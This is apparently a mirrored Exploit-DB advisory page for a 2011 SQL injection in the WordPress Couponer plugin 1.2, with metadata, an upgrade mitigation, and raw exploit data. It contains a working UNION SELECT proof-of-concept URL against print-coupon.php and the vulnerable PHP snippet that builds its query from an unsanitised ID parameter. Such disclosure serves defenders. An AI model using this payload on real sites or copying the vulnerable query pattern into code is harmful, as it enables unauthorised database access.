WordPress Couponer plugin - exploit.company

vendor:

Couponer

by:

Miroslav Stampar

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Couponer

Affected Version From: 1.2

Affected Version To: 1.2

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:couponer

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability

The WordPress Couponer plugin version 1.2 and below is vulnerable to a SQL injection vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the print-coupon.php script with a malicious ID parameter. This will allow the attacker to execute arbitrary SQL queries on the underlying database.

Mitigation:

Upgrade to the latest version of the WordPress Couponer plugin.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Couponer plugin <= 1.2 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/couponer.zip
# Version: 1.2 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/couponer/print-coupon.php?ID=-1' UNION ALL SELECT 1,version(),database(),current_user(),5,6,7,8,9,10--%20

---------------
Vulnerable code
---------------
$ID = $_GET['ID'];
...
$sql_get_coupon_id = "SELECT *, DATE_FORMAT(Expires, '%b %e, %Y') as Expires, DATE_FORMAT(Created, '%b %e, %Y') as Created FROM wp_couponer WHERE ID='$ID'";
$result_get_coupon_id = mysql_query($sql_get_coupon_id);